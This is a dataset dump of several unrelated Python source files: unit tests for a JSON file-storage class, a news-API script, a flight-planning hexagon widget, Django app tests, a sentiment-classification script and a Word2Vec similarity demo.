__file_path\n self.assertTrue(os.path.isfile(fs1._FileStorage__file_path))\n # writes to __file_path a JSON serialized string of __objects\n with open(fs1._FileStorage__file_path, encoding='utf-8') as file:\n contents = file.read()\n self.assertEqual(json.loads(contents), fs1._FileStorage__objects)\n\n def test_reload(self):\n \"\"\"Task 5. Store first object\n Tests public instance method `reload()`.\n \"\"\"\n fs1 = FileStorage()\n # TypeError: any args\n self.assertRaises(TypeError, fs1.reload, 'arg')\n # Normal use: no args, file contains string compatible with json.load()\n fs1.save()\n self.assertTrue(os.path.isfile(fs1._FileStorage__file_path))\n fs1.reload()\n with open(fs1._FileStorage__file_path, encoding='utf-8') as file:\n self.assertEqual(json.load(file), fs1._FileStorage__objects)\n # if __file_path does not exist, do nothing, no exception raised\n fs2 = FileStorage()\n __objects_pre_reload = fs2._FileStorage__objects\n fs2.save()\n os.remove(fs2._FileStorage__file_path)\n fs2.reload()\n self.assertEqual(fs2._FileStorage__objects, __objects_pre_reload)\n # file exists already but doesn't contain JSON format string\n __file_path = fs2._FileStorage__file_path\n content = 'Test text 0123456789abcdefghijklmnopqrstuvwxyz'\n with open(__file_path, 'w+', encoding='utf-8') as file:\n file.write(content)\n print(file.read())\n self.assertRaises(ValueError, fs2.reload)\n # KeyError: object in .json file has no `id` attribute\n # cls.__objects updated with key:'.id', value: obj\n # key:'.id' already in self.__objects\n\n def test_models___init__1(self):\n \"\"\"Task 5. Store first object\n Tests `models.__init__` for its use of `FileStorage` on instantiation\n of subclasses.\n Separated into 2 test methods to run `models.__init__` once per method.\n \"\"\"\n bm1 = BaseModel()\n # `storage` attr created\n from models import storage\n self.assertIsNotNone(storage)\n # `storage` is a `FileStorage` object\n self.assertIsInstance(storage, FileStorage)\n\n def test_models___init__2(self):\n \"\"\"Task 5. 
Store first object\n Tests `models.__init__` for its use of `FileStorage` on instantiation\n of subclasses.\n\n Separated into 2 test methods to run `models.__init__` once per method.\n \"\"\"\n\n pass\n", "sub_path": "tests/test_models/test_engine/test_file_storage.py", "file_name": "test_file_storage.py", "file_ext": "py", "file_size_in_byte": 7888, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "unittest.TestCase", "line_number": 11, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 14, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__file_path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 15, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__file_path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 16, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 22, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 24, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 25, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 31, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "shutil.copy2", "line_number": 33, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 34, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage._FileStorage__objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 47, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 49, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 56, "usage_type": "argument"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 58, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 59, "usage_type": "argument"}, {"api_name": "models.base_model.BaseModel", "line_number": 61, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 63, "usage_type": "argument"}, {"api_name": "models.storage", "line_number": 63, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 69, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 88, "usage_type": "call"}, {"api_name": "models.base_model.BaseModel", "line_number": 97, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", 
"line_number": 108, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 121, "usage_type": "call"}, {"api_name": "models.base_model.BaseModel", "line_number": 127, "usage_type": "call"}, {"api_name": "models.storage._FileStorage__objects.values", "line_number": 129, "usage_type": "call"}, {"api_name": "models.storage._FileStorage__objects", "line_number": 129, "usage_type": "attribute"}, {"api_name": "models.storage", "line_number": 129, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 151, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 162, "usage_type": "call"}, {"api_name": "os.path", "line_number": 162, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 165, "usage_type": "call"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 167, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 170, "usage_type": "call"}, {"api_name": "models.base_model.BaseModel", "line_number": 190, "usage_type": "call"}, {"api_name": "models.storage", "line_number": 193, "usage_type": "name"}, {"api_name": "models.engine.file_storage.FileStorage", "line_number": 195, "usage_type": "argument"}, {"api_name": "models.storage", "line_number": 195, "usage_type": "name"}]} +{"seq_id": "120393765", "text": "#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n# @Time : 2020/04/24 22:25\n# @Email : lukeqinlu@yeah.net\n# @Author : Luke\n# @File : loads_1.py\n# @notice :\n\n\nimport requests\nimport json\n\n\ndef main():\n resp = requests.get('http://api.tianapi.com/guonei/?key=APIKey&num=10')\n data_model = json.loads(resp.text)\n for news in data_model['newslist']:\n print(news['title'])\n\n\nif __name__ == '__main__':\n main()", "sub_path": "python_100_days/day01_15/loads_1.py", "file_name": "loads_1.py", "file_ext": "py", "file_size_in_byte": 423, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "412360892", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n\n mslib.msui.hexagon_dockwidget\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n Control widget to configure remote sensing overlays.\n\n This file is part of MSS.\n\n :copyright: Copyright 2016-2017 Joern Ungermann, Stefan Ensmann\n :copyright: Copyright 2016-2023 by the MSS team, see AUTHORS.\n :license: APACHE-2.0, see LICENSE for details.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nimport numpy as np\nimport logging\n\nfrom PyQt5 import QtWidgets\nfrom mslib.msui.qt5 import ui_hexagon_dockwidget as ui\nfrom 
mslib.msui import flighttrack as ft\nfrom mslib.utils.coordinate import rotate_point\nfrom mslib.utils.config import config_loader\n\n\nclass HexagonException(Exception):\n def __init__(self, error_string):\n logging.debug(\"%s\", error_string)\n\n\ndef create_hexagon(center_lat, center_lon, radius, angle=0., clockwise=True):\n coords = (radius, 0.)\n coords_cart = [rotate_point(coords, angle=_a + angle) for _a in range(0, 361, 60)]\n if not clockwise:\n coords_cart.reverse()\n coords_sphere = [\n (center_lat + (_x / 110.),\n center_lon + (_y / (110. * np.cos(np.deg2rad((_x / 110.) + center_lat)))))\n for _x, _y in coords_cart]\n return coords_sphere\n\n\nclass HexagonControlWidget(QtWidgets.QWidget, ui.Ui_HexagonDockWidget):\n \"\"\"\n This class implements the remote sensing functionality as dockable widget.\n \"\"\"\n\n def __init__(self, parent=None, view=None):\n \"\"\"\n Arguments:\n parent -- Qt widget that is parent to this widget.\n view -- reference to mpl canvas class\n \"\"\"\n super().__init__(parent)\n self.setupUi(self)\n self.view = view\n if self.view:\n self.view.tableWayPoints.selectionModel().selectionChanged.connect(self.on_selection_changed)\n self.on_selection_changed(None)\n\n self.dsbHexgaonRadius.setValue(200)\n\n self.pbAddHexagon.clicked.connect(self._add_hexagon)\n self.pbRemoveHexagon.clicked.connect(self._remove_hexagon)\n\n def on_selection_changed(self, index):\n \"\"\"\n Disables add and remove when multiple rows are selected\n \"\"\"\n enable = len(self.view.tableWayPoints.selectionModel().selectedRows()) <= 1\n self.pbAddHexagon.setEnabled(enable)\n self.pbRemoveHexagon.setEnabled(enable)\n\n def _get_parameters(self):\n return {\n \"center_lon\": self.dsbHexagonLongitude.value(),\n \"center_lat\": self.dsbHexagonLatitude.value(),\n \"radius\": self.dsbHexgaonRadius.value(),\n \"angle\": self.dsbHexagonAngle.value(),\n \"direction\": self.cbClock.currentText(),\n }\n\n def _add_hexagon(self):\n table_view = self.view.tableWayPoints\n waypoints_model = self.view.waypoints_model\n params = self._get_parameters()\n\n if params[\"radius\"] < 0.01:\n QtWidgets.QMessageBox.warning(\n self, \"Add hexagon\", \"You cannot create a hexagon with zero radius!\")\n return\n points = create_hexagon(params[\"center_lat\"], params[\"center_lon\"], params[\"radius\"],\n params[\"angle\"], params[\"direction\"] == \"clockwise\")\n index = table_view.currentIndex()\n if not index.isValid():\n row = 0\n flightlevel = config_loader(dataset=\"new_flighttrack_flightlevel\")\n else:\n row = index.row() + 1\n flightlevel = waypoints_model.waypoint_data(row - 1).flightlevel\n waypoints = []\n for i, point in enumerate(points):\n waypoints.append(\n ft.Waypoint(lon=float(point[1]), lat=float(point[0]),\n flightlevel=float(flightlevel), comments=f\"Hexagon {(i + 1):d}\"))\n waypoints_model.insertRows(row, rows=len(waypoints), waypoints=waypoints)\n index = waypoints_model.index(row, 0)\n table_view.setCurrentIndex(index)\n table_view.resizeRowsToContents()\n\n def _remove_hexagon(self):\n table_view = self.view.tableWayPoints\n waypoints_model = self.view.waypoints_model\n\n index = table_view.currentIndex()\n\n try:\n if not index.isValid():\n raise HexagonException(\"A waypoint of the hexagon must be selected.\")\n row = index.row()\n comm = str(waypoints_model.waypoint_data(row).comments)\n if len(comm) == 9 and comm.startswith(\"Hexagon \"):\n if (len(waypoints_model.all_waypoint_data()) - 7) < 2: # = 3 waypoints + 7 hexagon points\n raise HexagonException(\"Cannot remove 
hexagon, the flight track needs to consist \"\n \"of at least two points.\")\n idx = int(comm[-1])\n row_min = row - (idx - 1)\n row_max = row + (7 - idx)\n if row_min < 0 or row_max > len(waypoints_model.all_waypoint_data()):\n raise HexagonException(\"Cannot remove hexagon, hexagon is not complete \"\n f\"min, max = {row_min:d}, {row_max:d}\")\n else:\n found_one = False\n for i in range(0, row_max - row_min):\n if str(waypoints_model.waypoint_data(row_min + i).comments) != f\"Hexagon {(i + 1):d}\":\n found_one = True\n break\n if found_one:\n raise HexagonException(\"Cannot remove hexagon, hexagon comments are not found in all \"\n f\"points (min, max = {row_min:d}, {row_max:d})\")\n else:\n sel = QtWidgets.QMessageBox.question(\n None, \"Remove hexagon\",\n f\"This will remove waypoints {row_min:d}-{row_max:d}. Continue?\",\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,\n QtWidgets.QMessageBox.Yes)\n if sel == QtWidgets.QMessageBox.Yes:\n waypoints_model.removeRows(row_min, rows=7)\n else:\n raise HexagonException(\"Cannot remove hexagon, please select a hexagon \"\n \"waypoint ('Hexagon x' in comments field)\")\n except HexagonException as ex:\n QtWidgets.QMessageBox.warning(self, \"Remove hexagon\", str(ex))\n", "sub_path": "mslib/msui/hexagon_dockwidget.py", "file_name": "hexagon_dockwidget.py", "file_ext": "py", "file_size_in_byte": 6982, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.debug", "line_number": 39, "usage_type": "call"}, {"api_name": "mslib.utils.coordinate.rotate_point", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.deg2rad", "line_number": 49, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 54, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 54, "usage_type": "name"}, {"api_name": "mslib.msui.qt5.ui_hexagon_dockwidget.Ui_HexagonDockWidget", "line_number": 54, "usage_type": "attribute"}, {"api_name": "mslib.msui.qt5.ui_hexagon_dockwidget", "line_number": 54, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.warning", "line_number": 100, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 100, "usage_type": "name"}, {"api_name": "mslib.utils.config.config_loader", "line_number": 108, "usage_type": "call"}, {"api_name": "mslib.msui.flighttrack.Waypoint", "line_number": 115, "usage_type": "call"}, {"api_name": "mslib.msui.flighttrack", "line_number": 115, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.question", "line_number": 153, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 153, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 153, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 156, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 156, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 157, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 157, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 158, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 158, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.warning", "line_number": 164, "usage_type": 
"call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 164, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets", "line_number": 164, "usage_type": "name"}]} +{"seq_id": "574270763", "text": "#! /usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\ndansMonPanier app\nFile to run tests.\n\"\"\"\n\nfrom .views import *\nfrom .models import *\nfrom .forms import UserForm\nfrom datetime import datetime\nfrom django.contrib.auth.models import AnonymousUser, User\nfrom django.test import RequestFactory, TestCase\nfrom django.urls import reverse\n\n\nclass SimpleViewTest(TestCase):\n \"\"\"\n This class performs simple view tests\n through status code and pieces of content\n \"\"\"\n def test_index(self):\n response = self.client.get(reverse('index'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Trouvez un produit de substitution\")\n\n def test_legal(self):\n response = self.client.get(reverse('legal'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Directeur de publication\")\n\n def test_signin(self):\n response = self.client.get(reverse('signin'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Créez votre espace\")\n\n def test_user_login(self):\n response = self.client.get(reverse('user_login'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Accédez à votre espace\")\n\n def test_user_logout(self):\n response = self.client.get(reverse('user_logout'))\n self.assertEqual(response.status_code, 302)\n\n def test_my_favorites(self):\n response = self.client.get(reverse('my_favorites'))\n self.assertEqual(response.status_code, 302)\n\n def test_my_profile(self):\n response = self.client.get(reverse('my_profile'))\n self.assertEqual(response.status_code, 302)\n\n\nclass AppDataTestCase(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n \"\"\"\n This method creates temporary data\n for the needs of tests.\n \"\"\"\n Category.objects.create(\n id=0,\n category='pains',\n items=1,\n img_link='/img/pains.jpg'\n )\n\n Category.objects.create(\n id=1,\n category='beurres',\n items=1,\n img_link='/img/beurres.jpg'\n )\n\n Food.objects.create(\n id=0,\n category='pains',\n created=datetime.now(),\n code='0000000000000',\n name='Bread test',\n brands='Fake bread brand',\n stores='Carrefour',\n url='https://foo.bar',\n bio='TRUE',\n eco_packaging='TRUE',\n fsc='FALSE',\n utz='FALSE',\n palm_oil_free='FALSE',\n made_in_france='TRUE',\n ingredients_text='blé, eau, sel...',\n additives=3,\n allergens_from_ingredients='',\n quantity=4,\n image_url='https://foo-foo.bar',\n packaging='papier',\n french_ingredients='TRUE',\n fair_trade='FALSE',\n vegan='TRUE',\n vegetarian='TRUE',\n gluten_free='TRUE',\n iplc='FALSE',\n nova=3,\n nutrition_grade='b',\n energy=258,\n energy_unit='kcal',\n fat=2.0,\n saturated_fat=0.1,\n sugars=20.0,\n salt=2.0,\n fiber=10.0,\n proteins=66.0\n )\n\n Food.objects.create(\n id=1,\n category='beurres',\n created=datetime.now(),\n code='0000000000000',\n name='Butter test',\n brands='Fake butter brand',\n stores='Leclerc',\n url='https://foo.bar',\n bio='TRUE',\n eco_packaging='TRUE',\n fsc='FALSE',\n utz='FALSE',\n palm_oil_free='TRUE',\n made_in_france='TRUE',\n ingredients_text='lait, eau, sel...',\n additives=3,\n allergens_from_ingredients='',\n quantity=4,\n image_url='https://foo-foo.bar',\n packaging='papier',\n french_ingredients='TRUE',\n fair_trade='FALSE',\n vegan='FALSE',\n vegetarian='FALSE',\n gluten_free='TRUE',\n 
iplc='FALSE',\n nova=2,\n nutrition_grade='d',\n energy=788,\n energy_unit='kcal',\n fat=70.0,\n saturated_fat=35.0,\n sugars=1.0,\n salt=2.0,\n fiber=1.0,\n proteins=26.0\n )\n\n User.objects.create_user(\n id=0,\n username='testeur_monpanier@gmail.com',\n email='testeur_monpanier@gmail.com',\n password='!MonP@nier:159357$',\n first_name='Testeur@MonPanier')\n\n Favorite.objects.create(\n products=Food.objects.get(pk=0),\n user=User.objects.get(pk=0)\n )\n\n def setUp(self):\n \"\"\"\n Set working variables\n \"\"\"\n self.factory = RequestFactory()\n self.user = User.objects.get(username='testeur_monpanier@gmail.com')\n self.new_user = {\n 'email': 'jeanpaul-dubuc@gmail.com',\n 'username': 'jeanpaul-dubuc@gmail.com',\n 'password1': '$123a456Cv789p!',\n 'password2': '$123a456Cv789p!',\n 'first_name': '(Je@anP@ul)'\n }\n self.bad_user = {\n 'email': 'toto@gmail.com',\n 'username': 'toto@gmail.com',\n 'password1': '1234',\n 'password2': '1234',\n 'first_name': 'Toto'\n }\n\n def test_food_str(self):\n food = Food(name=\"Fake name\", stores=\"Fake stores\", category=\"test\")\n self.assertIs(food.__str__(), \"test\")\n\n def test_cat_str(self):\n category = Category(category=\"test\", items=10, img_link=\"/img/laits.jpg\")\n self.assertIs(category.__str__(), \"test\")\n\n def test_item_count(self):\n \"\"\"\n Verify the count of items\n \"\"\"\n self.assertEqual(Food.objects.count(), 2)\n\n def test_item_name(self):\n \"\"\"\n Verify that a new item was created\n \"\"\"\n self.assertTrue(Food.objects.filter(name='Bread test').exists())\n\n def test_item_nova(self):\n \"\"\"\n Verify the value of a specific feature\n \"\"\"\n product = Food.objects.get(name='Butter test')\n self.assertIs(product.nova, 2)\n\n def test_results_ranking_nova(self):\n \"\"\"\n Test results view regarding\n status and returned data\n with nova ranking\n and auth user\n \"\"\"\n request = self.factory.get('/results/?q=pain&ranking=nova')\n request.user = self.user\n response = results(request)\n user_favorites = Favorite().ref_list(request)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"pains\")\n self.assertEqual(len(user_favorites), 1)\n\n def test_results_ranking_nutrition(self):\n \"\"\"\n Test results view regarding\n status and returned data\n with nutrition ranking\n and anon user\n \"\"\"\n request = self.factory.get('/results/?q=beurre&ranking=nutrition')\n request.user = AnonymousUser()\n response = results(request)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"beurres\")\n\n def test_item(self):\n \"\"\"\n Test item view regarding\n status and returned data\n with auth user\n \"\"\"\n request = self.factory.get('/item/1/')\n request.user = self.user\n response = item(request, 1)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Butter test\")\n self.assertContains(response, \"Fake butter brand\")\n self.assertContains(response, \"Leclerc\")\n user_favorites = Favorite().ref_list(request)\n self.assertEqual(len(user_favorites), 1)\n\n def test_auth_ok(self):\n \"\"\"\n Test signin form and login\n for a valid user\n \"\"\"\n initial_count = User.objects.count()\n\n form = UserForm(data=self.new_user)\n self.assertTrue(form.is_valid())\n form.save()\n\n update_count = User.objects.count()\n self.assertEqual(update_count, initial_count + 1)\n\n user = User.objects.get(username='jeanpaul-dubuc@gmail.com')\n self.assertEqual(user.first_name, '(Je@anP@ul)')\n\n user_is_logged = 
self.client.login(username='jeanpaul-dubuc@gmail.com', password='$123a456Cv789p!')\n self.assertTrue(user_is_logged)\n\n def test_auth_nok(self):\n \"\"\"\n Test signin form and login\n for a not valid user\n \"\"\"\n form = UserForm(data=self.bad_user)\n self.assertFalse(form.is_valid())\n\n user_is_logged = self.client.login(username='toto@gmail.com', password='1234')\n self.assertFalse(user_is_logged)\n\n def test_my_profile_auth(self):\n \"\"\"\n Test the access to the profile page\n by an auth user and\n verify returned data\n \"\"\"\n request = self.factory.get(reverse('my_profile'))\n request.user = self.user\n response = my_profile(request)\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"testeur_monpanier@gmail.com\")\n\n def test_checking_user_favorites(self):\n \"\"\"\n Check favorite list content\n \"\"\"\n request = self.factory.get(reverse('my_favorites'))\n request.user = self.user\n favorites = Food.objects.filter(favorite__user=request.user)\n response = my_favorites(request)\n self.assertEqual(response.status_code, 200)\n self.assertIsNot(len(favorites), 0)\n\n def test_save_favorites_auth(self):\n \"\"\"\n Test the response of save_favorites\n when the user is authenticated\n \"\"\"\n product = Food.objects.get(pk=1)\n user = User.objects.get(pk=0)\n response = self.client.post(reverse('save_favorites'), {'products': product, 'user': user})\n self.assertEqual(response.status_code, 302)\n\n def test_favorites_count(self):\n \"\"\"\n Test favorites count\n is incremented when a\n product was added\n \"\"\"\n request = self.client.get(reverse('save_favorites'))\n request.user = self.user\n initial_count = Favorite.objects.count()\n new = Food.objects.get(pk=1)\n favorite = Favorite()\n favorite.products = new\n favorite.user = self.user\n favorite.save()\n update_count = Favorite.objects.count()\n self.assertEqual(update_count, initial_count + 1)\n", "sub_path": "explore/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 10600, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.test.TestCase", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 29, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 48, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 52, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 56, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 120, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 120, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 156, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 156, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 156, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 165, 
"usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 165, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 165, "usage_type": "name"}, {"api_name": "django.test.RequestFactory", "line_number": 172, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 173, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 173, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 173, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.AnonymousUser", "line_number": 239, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.count", "line_number": 265, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 265, "usage_type": "name"}, {"api_name": "forms.UserForm", "line_number": 267, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.count", "line_number": 271, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 271, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 271, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 274, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 274, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 274, "usage_type": "name"}, {"api_name": "forms.UserForm", "line_number": 285, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 297, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 307, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 320, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 320, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 320, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 321, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 330, "usage_type": "call"}]} +{"seq_id": "398780199", "text": "# 사용 모델 : LogisticRegression\n# 고정 변수 항목 : review text에 쓰인 단어들, 단어 빈도\n# 분석 목표(예측값) : 리뷰가 긍정인지 부정인지 판별\n\n# 종속 변수가 0 또는 1 인 분류 예측 문제이므로 로지스틱 회귀분석 모델 사용\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nimport pickle\n\nwith open('pre_movie_review.pickle', 'rb') as file:\n label, voca, feature = pickle.load(file)\n\n# train_test_split을 사용하여 학습데이터셋, 테스트데이터셋 분리 (default : train 75%\n# test 25%\ntrain_data, test_data, train_label, test_label = train_test_split(feature, label)\n\nclassifier = LogisticRegression()\nclassifier.fit(train_data, train_label)\n\nprint('학습 정확도: %.2f %%'%(classifier.score(train_data, train_label)*100))\nprint('테스트 정확도: %.2f %%\\n'%(classifier.score(test_data,test_label)*100))\n\n# 각 피처에 대한 편회귀계수(계수별 영향도)\nweight = classifier.coef_[0, :]\npair = []\nfor index,value in enumerate(weight):\n pair.append((abs(value), voca[index]))\npair.sort(key=lambda x:x[0], reverse=True)\nfor pr in pair[:20]:\n print('영향도: %4.4f => 단어: %s'%pr)", "sub_path": "03_Bigdata/04_AI/02. 
Text Mining/practice/1_Count Vectorizer_TfidTransformer/4_starwars/2_text_mining_logistic.py", "file_name": "2_text_mining_logistic.py", "file_ext": "py", "file_size_in_byte": 1240, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pickle.load", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "73345998", "text": "import os\n\nimport gensim.downloader as api\nfrom gensim.models import Word2Vec, KeyedVectors\n\n\ndef print_most_similar(word_conf_pairs, k):\n for i, (word, conf) in enumerate(word_conf_pairs):\n print(f'{conf:.3f} {word}')\n if i >= k - 1:\n break\n if k < len(word_conf_pairs):\n print('...')\n\n\nif __name__ == '__main__':\n bin_file_path = 'data/text8-word2vec.bin'\n\n if not os.path.exists(bin_file_path):\n dataset = api.load('text8')\n model = Word2Vec(dataset)\n os.makedirs('data', exist_ok=True)\n model.save(bin_file_path)\n\n model = KeyedVectors.load(bin_file_path)\n\n print(print_most_similar(model.wv.similar_by_word(\"taipei\"), 5))\n", "sub_path": "2020/09/20200903_Word2Vec_similar_by_word/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 705, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.exists", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "gensim.downloader.load", "line_number": 20, "usage_type": "call"}, {"api_name": "gensim.downloader", "line_number": 20, "usage_type": "name"}, {"api_name": "gensim.models.Word2Vec", "line_number": 21, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 22, "usage_type": "call"}, {"api_name": 